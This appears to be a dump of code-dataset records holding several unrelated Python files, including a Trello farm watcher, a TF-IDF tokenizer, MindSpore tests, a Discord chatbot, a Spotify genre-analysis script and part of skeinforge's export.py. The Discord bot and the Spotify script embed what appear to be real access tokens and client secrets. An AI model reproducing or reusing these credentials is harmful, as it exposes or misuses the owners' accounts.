self._get_var(\"SERVER_PORT\", is_required=True))\n\n except Exception as e:\n logging.critical(e)\n raise e\n\n def _get_var(self, var, is_required=False):\n try:\n file = open(self.config_path, 'r')\n for line in file:\n if not line.count('#') and line.count('='):\n cfgvars = line.split('=')\n varname = cfgvars[0].strip()\n value = cfgvars[1].strip()\n if value in ('True','False'):\n value = value == 'True'\n elif not value.count('\"'):\n value = int(value)\n else:\n value = value.replace('\"','')\n if var == varname:\n file.close()\n return value\n file.close()\n\n except Exception as e:\n raise e\n\n if not is_required:\n logging.info(\"Variable \" + str(var) + \" not found in config file!\")\n return None\n else:\n raise Exception(\"Variable \" + str(var) + \" must be in config file!\")\n\n def update_farm(self, name, ip):\n if not name or not ip:\n raise Exception(\"IP and name of farm is needed!\")\n\n if name not in self._farms:\n self._farms.append(name)\n self._farms_ip.append(\"\")\n self._last_alive_time.append(datetime.now())\n\n try:\n farm_id = self._farms.index(name)\n self._farms_ip[farm_id] = ip\n self._last_alive_time[farm_id] = datetime.now()\n\n except Exception as e:\n logging.error(e)\n raise e\n\n return True\n\n def farm_list(self):\n farms = []\n for id, farm in enumerate(self._farms):\n farm_info = {}\n farm_info[\"name\"] = farm\n farm_info[\"ip\"] = self._farms_ip[id]\n farm_info[\"last_alive_time\"] = self._last_alive_time[id]\n farms.append(farm_info)\n\n return farms\n\n def check_farms(self):\n for farm_id, last_time in enumerate(self._last_alive_time):\n try:\n if (datetime.now() - last_time).total_seconds() > self.post_issue_after:\n issue = self._TrelloNotifier.issue(\"\", self._farms[farm_id],\n description=\"Last alive time \" +\n datetime.strftime(last_time, \"%Y.%m.%d %H:%M\"),\n label_color=\"red\")\n for name in self.trello_admins:\n try:\n issue.assign(self._TrelloNotifier.member(name).id)\n except Exception as e:\n pass\n\n except Exception as e:\n logging.error(e)\n\n\nmy_watcher = FarmWatcher(os.path.dirname(os.path.abspath(sys.argv[0])) + '/farmWatcher.conf')\nimport time\n\nwhile True:\n my_watcher.check_farms()\n time.sleep(10)","sub_path":"farmWatcher.py","file_name":"farmWatcher.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"251918109","text":"#!/bin/env python\n# coding:utf-8\n\n# http://qiita.com/ynakayama/items/05ab9ab9b7c579894bd7\n\nimport os\nimport MeCab\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport re\n\nhome = os.path.expanduser('../../data')\ntarget_dir = os.path.join(home, 'cao')\ntoken_dict = {}\n\ndef tokenize(text):\n \"\"\" MeCab で分かち書きした結果をトークンとして返す \"\"\"\n wakati = MeCab.Tagger(\"-O wakati\")\n return wakati.parse(text)\n\n# ひとつひとつファイルを読み込んで\n# ファイル名に対して語彙群のディクショナリを生成する\nfor subdir, dirs, files in os.walk(target_dir):\n for file in files:\n if re.match(\"^.*conv$\",file) is None:\n continue\n file_path = os.path.join(subdir, file)\n shakes = open(file_path, 'r')\n text = shakes.read()\n lowers = text.lower()\n token_dict[file] = tokenize(lowers)\n\n# scikit-learn の TF-IDF ベクタライザーを使う\n#tfidf = TfidfVectorizer(tokenizer=tokenize, stop_words='english')\n#tmp=token_dict.values()\n#tfs = tfidf.fit_transform(token_dict.values())\n\nprint(token_dict)\n#print(tfs.toarray())\n","sub_path":"cao/12_tfidf.py","file_name":"12_tfidf.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"465502446","text":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\" test_embedding \"\"\"\nimport numpy as np\n\nfrom mindspore import Tensor\nfrom mindspore import dtype as mstype\nfrom mindspore.model_zoo.Bert_NEZHA import EmbeddingLookup, EmbeddingPostprocessor\nfrom ..ut_filter import non_graph_engine\n\n\n@non_graph_engine\ndef test_check_embedding_lookup_1():\n m = EmbeddingLookup(vocab_size=32000,\n embedding_size=768,\n embedding_shape=[1, 128, 768],\n use_one_hot_embeddings=False)\n m(Tensor(np.ones([128]), mstype.int32))\n\n\n@non_graph_engine\ndef test_check_embedding_lookup_2():\n m = EmbeddingLookup(vocab_size=32000,\n embedding_size=768,\n embedding_shape=[1, 128, 768],\n use_one_hot_embeddings=True)\n m(Tensor(np.ones([128]), mstype.int32))\n\n\n@non_graph_engine\ndef test_check_embedding_lookup_3():\n m = EmbeddingLookup(vocab_size=32000,\n embedding_size=768,\n embedding_shape=[1, 128, 768],\n use_one_hot_embeddings=True,\n initializer_range=0.01)\n m(Tensor(np.ones([128]), mstype.int32))\n\n\n@non_graph_engine\ndef test_embedding_post_1():\n m = EmbeddingPostprocessor(embedding_size=768,\n embedding_shape=[1, 128, 768],\n use_token_type=True)\n m(Tensor(np.ones([128]), mstype.int32), Tensor(np.ones([1, 128, 768]), mstype.float32))\n\n\n@non_graph_engine\ndef test_embedding_post_2():\n m = EmbeddingPostprocessor(embedding_size=768,\n embedding_shape=[1, 128, 768],\n use_token_type=True,\n initializer_range=0.3)\n m(Tensor(np.ones([128]), mstype.int32), Tensor(np.ones([1, 128, 768]), mstype.float32))\n","sub_path":"tests/ut/python/nn/test_embedding.py","file_name":"test_embedding.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"262905070","text":"\"\"\"\r\nIntersection: Given two singly linked lists, determine if the two lists intersect. Return the intersecting node. Note that the intersection is defined based on reference not value. That is, if the kth node of the first linked list is the exact same node (by reference) as the jth node of the second linked list, then they are intersecting.\r\n\"\"\"\r\n\r\nfrom lib.single_linked_list import *\r\n\r\ndef intersection(head1, head2):\r\n\tl1_data = tail_and_size(head1)\r\n\tl2_data = tail_and_size(head2)\r\n\tsize_1 = l1_data[0]\r\n\ttail_1 = l1_data[1]\r\n\tsize_2 = l2_data[0]\r\n\ttail_2 = l2_data[1]\r\n\r\n\tif tail_1 != tail_2:\r\n\t\treturn None\r\n\tif size_1 < size_2:\r\n\t\tptr_2 = move_ptr(head2, size_2 - size_1)\r\n\t\tptr_1 = head1\r\n\t\treturn get_intersect(ptr_1, ptr_2)\r\n\telif size_2 < size_1:\r\n\t\tptr_1 = move_ptr(head1, size_1 - size_2)\r\n\t\tptr_2 = head2\r\n\t\treturn get_intersect(ptr_1, ptr_2)\r\n\telse:\r\n\t\treturn get_intersect(ptr_1, ptr_2)\r\n\r\ndef tail_and_size(head):\r\n\tptr = head\r\n\tsize = 1\r\n\twhile ptr.next is not None:\r\n\t\tptr = ptr.next\r\n\t\tsize += 1\r\n\treturn (size, ptr)\r\n\r\ndef move_ptr(head, diff):\r\n\tptr = head\r\n\twhile diff > 0:\r\n\t\tptr = ptr.next\r\n\t\tdiff -= 1\r\n\treturn ptr\r\ndef get_intersect(head1, head2):\r\n\tptr1 = head1\r\n\tptr2 = head2\r\n\twhile ptr1 is not None and ptr2 is not None:\r\n\t\tif ptr1 == ptr2:\r\n\t\t\treturn ptr1\r\n\t\tptr1 = ptr1.next\r\n\t\tptr2 = ptr2.next\r\n\treturn None\r\n\r\n\r\n\r\ndef main():\r\n\tlist_1 = singly_linked_list()\r\n\tlist_1.insert_tail(3)\r\n\tlist_1.insert_tail(1)\r\n\tlist_1.insert_tail(5)\r\n\tlist_1.insert_tail(9)\r\n\tlist_1.insert_tail(7)\r\n\tlist_1.insert_tail(2)\r\n\tlist_1.insert_tail(1)\r\n\r\n\tintersect = list_1.search(7)\r\n\r\n\tlist_2 = singly_linked_list()\r\n\tlist_2.insert_tail(4)\r\n\tlist_2.insert_tail(6)\r\n\tlist_2.insert_node(intersect)\r\n\tresult = intersection(list_1.head, list_2.head)\r\n\tif result:\r\n\t\tprint(\"List Intersect is: {}\".format(result.data))\r\n\telse:\r\n\t\tprint(\"List Intersect is: {}\".format(result))\r\n\r\n\r\n \r\nif __name__ == '__main__':\r\n\tmain()\r\n\r\n","sub_path":"ctci/ch2/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"179056335","text":"d = {\r\n \"Алексеев\":[13000,\"male\"],\r\n \"Горбачёва\":[14000,\"female\"],\r\n \"Осипов\":[15000,\"male\"],\r\n \"Илясова\":[9000,\"female\"],\r\n \"Маслов\":[24000,\"male\"],\r\n \"Авдеева\":[18000,\"female\"],\r\n \"Куликов\":[7000,\"male\"],\r\n \"Борисова\":[25000,\"female\"],\r\n \"Сафонов\":[200000,'male'],\r\n \"Волкова\":[17000,'female'],\r\n }\r\nfor gon in sorted(d.items(),key=lambda para:para[1]):\r\n if gon[1][1] == \"male\":\r\n print(gon)\r\n\r\n","sub_path":"LR_18.py","file_name":"LR_18.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"364929448","text":"import discord\r\nimport asyncio\r\nimport urllib.request\r\n\r\nclient = discord.Client()\r\n\r\n@client.event\r\nasync def on_ready():\r\n print('Logged in as')\r\n print(client.user.name)\r\n print(client.user.id)\r\n print('------')\r\n\r\n@client.event\r\nasync def on_message(message):\r\n\tif message.channel.id == \"513425150927044648\":\r\n\t if message.content.startswith(client.user.mention+\" \"):\r\n\t fp = urllib.request.urlopen(\"http://miceclan.com/api/cb/input?k=sam2&i=\"+urllib.parse.quote(message.content[len(client.user.mention)+1:]))\r\n\t mybytes = fp.read()\r\n\t mystr = mybytes.decode(\"utf8\")\r\n\t fp.close()\r\n\t await client.send_message(message.channel, str(message.author.mention)+\", \"+str(mystr))\r\n\r\nclient.run('NTEzNDIzMjY1ODg1MTkyMjAy.DtHydQ.Nwl4iQzIZP5Q6RdQTzegd2sV4uE')","sub_path":"Luffy.py","file_name":"Luffy.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"632831209","text":"import matplotlib.pyplot as plt\nimport numpy\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom spotipy.oauth2 import SpotifyOAuth\nimport requests\nimport base64\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport re\n#Talal Brek's Contribution\nusername = '22kx7zq2hwaxl66q3uqjwc2zq'\nCLIENT_ID = 'f238edd5fc9e4d1a9f074ee91f9fe017'\nCLIENT_SECRET = 'b84ff4eee3ef4199b78c734f39624fcc'\nscope = \"user-library-read\"\ntop_200 = pd.read_csv(\"US_Top200_10-10-2020.csv\")\ngenres = dict()\ngenre_list = list()\ngenres['RAP'] = 0\ngenres['OTHER'] =0\n\n\n\n\"\"\"\n\n\"\"\"\ntop_200_artists = top_200['Artist']\n\nsp = spotipy.Spotify(auth_manager=SpotifyOAuth('f238edd5fc9e4d1a9f074ee91f9fe017','b84ff4eee3ef4199b78c734f39624fcc',scope=scope,redirect_uri = 'https://www.spotify.com/us/account/overview/'))\n\ntop_200_artists = top_200['Artist']\nfor i in top_200_artists:\n artist = sp.search(q = i, type ='artist')\n genre_str = ''\n for genre in artist['artists']['items'][0]['genres']:\n genre_str += genre\n genre_list.append(genre)\n if 'rap' in genre_str:\n genres['RAP'] +=1\n \n else:\n genres['OTHER'] += 1\n artist_list = i.split(' ')\n \n \n\n \n\n \n \nprint(genres)\nprint(genre_list)\nwordcloud_string = ''\n\nwordcloud = WordCloud(width=1600, height=800, max_font_size=200, background_color=\"black\").generate(str(genre_list))\n # plt the image generated by WordCloud class\nplt.figure(figsize=(12,10))\nplt.imshow(wordcloud)\nplt.axis(\"off\")\nplt.show()\nplt.savefig('TBrek_Genre_WordCloud.png') \n\n\nx = list(genres.keys())\ny = list(genres.values())\nprint('x = ', x, 'y = ', y) \nfig, axs = plt.subplots(2)\nplt.title(\"RAP VS OTHER GENRES TOP 200 2020\", fontsize=14);\naxs[0].pie(x=y, autopct=\"%.1f%%\", labels=x, pctdistance=0.5)\n\nplt.savefig('tbrek_rap_vs_other_pie.png')\naxs[1].bar(x , y, width = 0.2, color = 'maroon')\nplt.xlabel(\"Genres\") \nplt.ylabel(\"No. of songs\") \nplt.show()\n#plt.title(\"RAP VS OTHER GENRES TOP 200 2020\", fontsize=14);\nplt.savefig('tbrek_rap_vs_other_bar.png')\n\n\n","sub_path":"TBrek.py","file_name":"TBrek.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"470136170","text":"\"\"\"\nThis page is in the table of contents.\nExport is a craft tool to pick an export plugin, add information to the file name, and delete comments.\n\nThe export manual page is at:\nhttp://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Export\n\n==Operation==\nThe default 'Activate Export' checkbox is on. When it is on, the functions described below will work, when it is off, the functions will not be called.\n\n==Settings==\n===Add Descriptive Extension===\nDefault is off.\n\nWhen selected, key profile values will be added as an extension to the gcode file. For example:\ntest.04hx06w_03fill_2cx2r_33EL.gcode\n\nwould mean:\n\n* . (Carve section.)\n* 04h = 'Layer Thickness (mm):' 0.4\n* x\n* 06w = 0.6 width i.e. 0.4 times 'Perimeter Width over Thickness (ratio):' 1.5\n* _ (Fill section.)\n* 03fill = 'Infill Solidity (ratio):' 0.3\n* _ (Multiply section; if there is one column and one row then this section is not shown.)\n* 2c = 'Number of Columns (integer):' 2\n* x\n* 2r = 'Number of Rows (integer):' 2.\n* _ (Speed section.)\n* 33EL = 'Feed Rate (mm/s):' 33.0 and 'Flow Rate Setting (float):' 33.0. If either value has a positive value after the decimal place then this is also shown, but if it is zero it is hidden. Also, if the values differ (which they shouldn't with 5D volumetrics) then each should be displayed separately. For example, 35.2E30L = 'Feed Rate (mm/s):' 35.2 and 'Flow Rate Setting (float):' 30.0.\n\n===Add Profile Extension===\nDefault is off.\n\nWhen selected, the current profile will be added to the file extension. For example:\ntest.my_profile_name.gcode\n\n===Add Timestamp Extension===\nDefault is off.\n\nWhen selected, the current date and time is added as an extension in format YYYYmmdd_HHMMSS (so it is sortable if one has many files). For example:\ntest.my_profile_name.20110613_220113.gcode\n\n===Also Send Output To===\nDefault is empty.\n\nDefines the output name for sending to a file or pipe. A common choice is stdout to print the output in the shell screen. Another common choice is stderr. With the empty default, nothing will be done. If the value is anything else, the output will be written to that file name.\n\n===Analyze Gcode===\nDefault is on.\n\nWhen selected, the penultimate gcode will be sent to the analyze plugins to be analyzed and viewed.\n\n===Comment Choice===\nDefault is 'Delete All Comments'.\n\n====Do Not Delete Comments====\nWhen selected, export will not delete comments. Crafting comments slow down the processing in many firmware types, which leads to pauses and therefore a lower quality print.\n \n====Delete Crafting Comments====\nWhen selected, export will delete the time consuming crafting comments, but leave the initialization comments. Since the crafting comments are deleted, there are no pauses during extrusion. The remaining initialization comments provide some useful information for the analyze tools.\n\n====Delete All Comments====\nWhen selected, export will delete all comments. The comments are not necessary to run a fabricator. Some printers do not support comments at all so the safest way is choose this option.\n\n===Export Operations===\nExport presents the user with a choice of the export plugins in the export_plugins folder. The chosen plugin will then modify the gcode or translate it into another format. There is also the \"Do Not Change Output\" choice, which will not change the output. An export plugin is a script in the export_plugins folder which has the getOutput function, the globalIsReplaceable variable and if it's output is not replaceable, the writeOutput function.\n\n===File Extension===\nDefault is gcode.\n\nDefines the file extension added to the name of the output file. The output file will be named as originalname_export.extension so if you are processing XYZ.stl the output will by default be XYZ_export.gcode\n \n===Name of Replace File===\nDefault is replace.csv.\n\nWhen export is exporting the code, if there is a tab separated file with the name of the \"Name of Replace File\" setting, it will replace the string in the first column by its replacement in the second column. If there is nothing in the second column, the first column string will be deleted, if this leads to an empty line, the line will be deleted. If there are replacement columns after the second, they will be added as extra lines of text. There is an example file replace_example.csv to demonstrate the tab separated format, which can be edited in a text editor or a spreadsheet.\n\nExport looks for the alteration file in the alterations folder in the .skeinforge folder in the home directory. Export does not care if the text file names are capitalized, but some file systems do not handle file name cases properly, so to be on the safe side you should give them lower case names. If it doesn't find the file it then looks in the alterations folder in the skeinforge_plugins folder.\n\n===Save Penultimate Gcode===\nDefault is off.\n\nWhen selected, export will save the gcode file with the suffix '_penultimate.gcode' just before it is exported. This is useful because the code after it is exported could be in a form which the viewers can not display well.\n\n==Examples==\nThe following examples export the file Screw Holder Bottom.stl. The examples are run in a terminal in the folder which contains Screw Holder Bottom.stl and export.py.\n\n> python export.py\nThis brings up the export dialog.\n\n> python export.py Screw Holder Bottom.stl\nThe export tool is parsing the file:\nScrew Holder Bottom.stl\n..\nThe export tool has created the file:\n.. Screw Holder Bottom_export.gcode\n\n\"\"\"\n\nfrom __future__ import absolute_import\n#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.\nimport __init__\n\nfrom fabmetheus_utilities.fabmetheus_tools import fabmetheus_interpret\nfrom fabmetheus_utilities import archive\nfrom fabmetheus_utilities import euclidean\nfrom fabmetheus_utilities import gcodec\nfrom fabmetheus_utilities import intercircle\nfrom fabmetheus_utilities import settings\nfrom skeinforge_application.skeinforge_utilities import skeinforge_analyze\nfrom skeinforge_application.skeinforge_utilities import skeinforge_craft\nfrom skeinforge_application.skeinforge_utilities import skeinforge_polyfile\nfrom skeinforge_application.skeinforge_utilities import skeinforge_profile\nimport cStringIO\nimport os\nimport sys\nimport time\n\n\n__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'\n__credits__ = 'Gary Hodgson '\n__date__ = '$Date: 2008/21/04 $'\n__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'\n\n\ndef getCraftedTextFromText(gcodeText, repository=None):\n\t'Export a gcode linear move text.'\n\tif gcodec.isProcedureDoneOrFileIsEmpty( gcodeText, 'export'):\n\t\treturn gcodeText\n\tif repository is None:\n\t\trepository = settings.getReadRepository(ExportRepository())\n\tif not repository.activateExport.value:\n\t\treturn gcodeText\n\treturn ExportSkein().getCraftedGcode(repository, gcodeText)\n\ndef getDescriptionCarve(lines):\n\t'Get the description for carve.'\n\tdescriptionCarve = ''\n\tlayerThicknessString = getSettingString(lines, 'carve', 'Layer Thickness')\n\tif layerThicknessString is not None:\n\t\tdescriptionCarve += layerThicknessString.replace('.', '') + 'h'\n\tperimeterWidthString = getSettingString(lines, 'carve', 'Perimeter Width over Thickness')\n\tif perimeterWidthString is not None:\n\t\tdescriptionCarve += 'x%sw' % str(float(perimeterWidthString) * float(layerThicknessString)).replace('.', '')\n\treturn descriptionCarve\n\ndef getDescriptionFill(lines):\n\t'Get the description for fill.'\n\tactivateFillString = getSettingString(lines, 'fill', 'Activate Fill')\n\tif activateFillString is None or activateFillString == 'False':\n\t\treturn ''\n\tinfillSolidityString = getSettingString(lines, 'fill', 'Infill Solidity')\n\treturn '_' + infillSolidityString.replace('.', '') + 'fill'\n\ndef getDescriptionMultiply(lines):\n\t'Get the description for multiply.'\n\tactivateMultiplyString = getSettingString(lines, 'multiply', 'Activate Multiply')\n\tif activateMultiplyString is None or activateMultiplyString == 'False':\n\t\treturn ''\n\tcolumnsString = getSettingString(lines, 'multiply', 'Number of Columns')\n\trowsString = getSettingString(lines, 'multiply', 'Number of Rows')\n\tif columnsString == '1' and rowsString == '1':\n\t\treturn ''\n\treturn '_%scx%sr' % (columnsString, rowsString)\n\ndef getDescriptionSpeed(lines):\n\t'Get the description for speed.'\n\tactivateSpeedString = getSettingString(lines, 'speed', 'Activate Speed')\n\tif activateSpeedString is None or activateSpeedString == 'False':\n\t\treturn ''\n\tfeedRateString = getSettingString(lines, 'speed', 'Feed Rate')\n\tflowRateString = getSettingString(lines, 'speed', 'Flow Rate')\n\tif feedRateString == flowRateString:\n\t\treturn '_%sEL' % feedRateString.replace('.0', '')\n\treturn '_%sE%sL' % (feedRateString.replace('.0', ''), flowRateString.replace('.0', ''))\n\ndef getDescriptiveExtension(gcodeText):\n\t'Get the descriptive extension.'\n\tlines = archive.getTextLines(gcodeText)\n\treturn '.' + getDescriptionCarve(lines) + getDescriptionFill(lines) + getDescriptionMultiply(lines) + getDescriptionSpeed(lines)\n\ndef getDistanceGcode(exportText):\n\t'Get gcode lines with distance variable added.'\n\tlines = archive.getTextLines(exportText)\n\toldLocation = None\n\tfor line in lines:\n\t\tsplitLine = gcodec.getSplitLineBeforeBracketSemicolon(line)\n\t\tfirstWord = None\n\t\tif len(splitLine) > 0:\n\t\t\tfirstWord = splitLine[0]\n\t\tif firstWord == 'G1':\n\t\t\tlocation = gcodec.getLocationFromSplitLine(oldLocation, splitLine)\n\t\t\tif oldLocation is not None:\n\t\t\t\tdistance = location.distance(oldLocation)\n\t\t\t\tprint( distance )\n\t\t\toldLocation = location\n\treturn exportText\n\ndef getFirstValue(gcodeText, word):\n\t'Get the value from the first line which starts with the given word.'\n\tfor line in archive.getTextLines(gcodeText):\n\t\tsplitLine = gcodec.getSplitLineBeforeBracketSemicolon(line)\n\t\tif gcodec.getFirstWord(splitLine) == word:\n\t\t\treturn splitLine[1]\n\treturn ''\n\ndef getNewRepository():\n\t'Get new repository.'\n\treturn ExportRepository()\n\ndef getReplaceableExportGcode(nameOfReplaceFile, replaceableExportGcode):\n\t'Get text with strings replaced according to replace.csv file.'\n\treplaceLines = settings.getAlterationLines(nameOfReplaceFile)\n\tif len(replaceLines) < 1:\n\t\treturn replaceableExportGcode\n\tfor replaceLine in replaceLines:\n\t\tsplitLine = replaceLine.replace('\\\\n', '\\t').split('\\t')\n\t\tif len(splitLine) > 0:\n\t\t\treplaceableExportGcode = replaceableExportGcode.replace(splitLine[0], '\\n'.join(splitLine[1 :]))\n\toutput = cStringIO.StringIO()\n\tgcodec.addLinesToCString(output, archive.getTextLines(replaceableExportGcode))\n\treturn output.getvalue()\n\ndef getSelectedPluginModule( plugins ):\n\t'Get the selected plugin module.'\n\tfor plugin in plugins:\n\t\tif plugin.value:\n\t\t\treturn archive.getModuleWithDirectoryPath( plugin.directoryPath, plugin.name )\n\treturn None\n\ndef getSettingString(lines, procedureName, settingNameStart):\n\t'Get the setting value from the lines, return None if there is no setting starting with that name.'\n\tsettingNameStart = settingNameStart.replace(' ', '_')\n\tfor line in lines:\n\t\tsplitLine = gcodec.getSplitLineBeforeBracketSemicolon(line)\n\t\tfirstWord = None\n\t\tif len(splitLine) > 0:\n\t\t\tfirstWord = splitLine[0]\n\t\tif firstWord == '(':\n\t\t\tif len(splitLine) > 4:\n\t\t\t\tif splitLine[1] == procedureName and splitLine[2].startswith(settingNameStart):\n\t\t\t\t\treturn splitLine[3]\n\t\telif firstWord == '()':\n\t\t\treturn None\n\treturn None\n\ndef sendOutputTo(outputTo, text):\n\t'Send output to a file or a standard output.'\n\tif outputTo.endswith('stderr'):\n\t\tsys.stderr.write(text)\n\t\tsys.stderr.write('\\n')\n\t\tsys.stderr.flush()\n\t\treturn\n\tif outputTo.endswith('stdout'):\n\t\tsys.stdout.write(text)\n\t\tsys.stdout.write('\\n')\n\t\tsys.stdout.flush()\n\t\treturn\n\tarchive.writeFileText(outputTo, text)\n\ndef writeOutput(fileName, shouldAnalyze=True):\n\t'Export a gcode linear move file.'\n\tif fileName == '':\n\t\treturn None\n\trepository = ExportRepository()\n\tsettings.getReadRepository(repository)\n\tstartTime = time.time()\n\tprint('File ' + archive.getSummarizedFileName(fileName) + ' is being chain exported.')\n\tfileNameSuffix = fileName[: fileName.rfind('.')]\n\tif repository.addExportSuffix.value:\n\t\tfileNameSuffix += '_export'\n\tgcodeText = gcodec.getGcodeFileText(fileName, '')\n\tprocedures = skeinforge_craft.getProcedures('export', gcodeText)\n\tgcodeText = skeinforge_craft.getChainTextFromProcedures(fileName, procedures[: -1], gcodeText)\n\tif gcodeText == '':\n\t\treturn None\n\tif repository.addProfileExtension.value:\n\t\tfileNameSuffix += '.' + getFirstValue(gcodeText, '(')\n\tif repository.addDescriptiveExtension.value:\n\t\tfileNameSuffix += getDescriptiveExtension(gcodeText)\n\tif repository.addTimestampExtension.value:\n\t\tfileNameSuffix += '.' + getFirstValue(gcodeText, '(')\n\tfileNameSuffix += '.' + repository.fileExtension.value\n\tfileNamePenultimate = fileName[: fileName.rfind('.')] + '_penultimate.gcode'\n\tfilePenultimateWritten = False\n\tif repository.savePenultimateGcode.value:\n\t\tarchive.writeFileText(fileNamePenultimate, gcodeText)\n\t\tfilePenultimateWritten = True\n\t\tprint('The penultimate file is saved as ' + archive.getSummarizedFileName(fileNamePenultimate))\n\texportGcode = getCraftedTextFromText(gcodeText, repository)\n\twindow = None\n\tif shouldAnalyze and repository.analyzeGcode.value:\n\t\twindow = skeinforge_analyze.writeOutput(fileName, fileNamePenultimate, fileNameSuffix, filePenultimateWritten, gcodeText)\n\treplaceableExportGcode = None\n\tselectedPluginModule = getSelectedPluginModule(repository.exportPlugins)\n\tif selectedPluginModule is None:\n\t\treplaceableExportGcode = exportGcode\n\telse:\n\t\tif selectedPluginModule.globalIsReplaceable:\n\t\t\treplaceableExportGcode = selectedPluginModule.getOutput(exportGcode)\n\t\telse:\n\t\t\tselectedPluginModule.writeOutput(fileNameSuffix, exportGcode)\n\tif replaceableExportGcode is not None:\n\t\treplaceableExportGcode = getReplaceableExportGcode(repository.nameOfReplaceFile.value, replaceableExportGcode)\n\t\tarchive.writeFileText( fileNameSuffix, replaceableExportGcode )\n\t\tprint('The exported file is saved as ' + archive.getSummarizedFileName(fileNameSuffix))\n\tif repository.alsoSendOutputTo.value != '':\n\t\tif replaceableExportGcode is None:\n\t\t\treplaceableExportGcode = selectedPluginModule.getOutput(exportGcode)\n\t\tsendOutputTo(repository.alsoSendOutputTo.value, replaceableExportGcode)\n\tprint('It took %s to export the file.' % euclidean.getDurationString(time.time() - startTime))\n\treturn window\n\n\nclass ExportRepository:\n\t'A class to handle the export settings.'\n\tdef __init__(self):\n\t\t'Set the default settings, execute title & settings fileName.'\n\t\tskeinforge_profile.addListsToCraftTypeRepository('skeinforge_application.skeinforge_plugins.craft_plugins.export.html', self)\n\t\tself.fileNameInput = settings.FileNameInput().getFromFileName( fabmetheus_interpret.getGNUTranslatorGcodeFileTypeTuples(), 'Open File for Export', self, '')\n\t\tself.openWikiManualHelpPage = settings.HelpPage().getOpenFromAbsolute('http://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Export')\n\t\tself.activateExport = settings.BooleanSetting().getFromValue('Activate Export', self, True)\n\t\tself.addExportSuffix = settings.BooleanSetting().getFromValue('Add _export to filename (filename_export)', self, True)\n\t\tself.alsoSendOutputTo = settings.StringSetting().getFromValue('Also Send Output To:', self, '')\n\t\tself.analyzeGcode = settings.BooleanSetting().getFromValue('Analyze Gcode', self, True)\n\t\tself.commentChoice = settings.MenuButtonDisplay().getFromName('Handling of Comments in G-Code:', self)\n\t\tself.doNotDeleteComments = settings.MenuRadio().getFromMenuButtonDisplay(self.commentChoice, 'Do Not Delete Comments', self, False)\n\t\tself.deleteCraftingComments = settings.MenuRadio().getFromMenuButtonDisplay(self.commentChoice, 'Delete Crafting Comments', self, False)\n\t\tself.deleteAllComments = settings.MenuRadio().getFromMenuButtonDisplay(self.commentChoice, 'Delete All Comments', self, True)\n\t\texportPluginsFolderPath = archive.getAbsoluteFrozenFolderPath(archive.getCraftPluginsDirectoryPath('export.py'), 'export_plugins')\n\t\texportStaticDirectoryPath = os.path.join(exportPluginsFolderPath, 'static_plugins')\n\t\texportPluginFileNames = archive.getPluginFileNamesFromDirectoryPath(exportPluginsFolderPath)\n\t\texportStaticPluginFileNames = archive.getPluginFileNamesFromDirectoryPath(exportStaticDirectoryPath)\n\t\tsettings.LabelDisplay().getFromName(' ', self)\n\t\tself.exportLabel = settings.LabelDisplay().getFromName('--Export Operations-- ', self)\n\t\tself.exportPlugins = []\n\t\texportLatentStringVar = settings.LatentStringVar()\n\t\tself.doNotChangeOutput = settings.RadioCapitalized().getFromRadio(exportLatentStringVar, 'Do Not Change Output', self, True)\n\t\tself.doNotChangeOutput.directoryPath = None\n\t\tallExportPluginFileNames = exportPluginFileNames + exportStaticPluginFileNames\n\t\tfor exportPluginFileName in allExportPluginFileNames:\n\t\t\texportPlugin = None\n\t\t\tif exportPluginFileName in exportPluginFileNames:\n\t\t\t\tpath = os.path.join(exportPluginsFolderPath, exportPluginFileName)\n\t\t\t\texportPlugin = settings.RadioCapitalizedButton().getFromPath(exportLatentStringVar, exportPluginFileName, path, self, False)\n\t\t\t\texportPlugin.directoryPath = exportPluginsFolderPath\n\t\t\telse:\n\t\t\t\texportPlugin = settings.RadioCapitalized().getFromRadio(exportLatentStringVar, exportPluginFileName, self, False)\n\t\t\t\texportPlugin.directoryPath = exportStaticDirectoryPath\n\t\t\tself.exportPlugins.append(exportPlugin)\n\t\tself.fileExtension = settings.StringSetting().getFromValue('File Extension (gcode):', self, 'gcode')\n\t\tself.nameOfReplaceFile = settings.StringSetting().getFromValue('Name of Replace File:', self, 'replace.csv')\n\t\tself.savePenultimateGcode = settings.BooleanSetting().getFromValue('Save Penultimate Gcode', self, True)\n\t\tsettings.LabelDisplay().getFromName(' ', self)\n\t\tsettings.LabelDisplay().getFromName('--File Name Alterations--', self)\n\t\tsettings.LabelDisplay().getFromName('\"WARNING\" IF ANY OF BELOW CHECKBOXES ARE CHECKED', 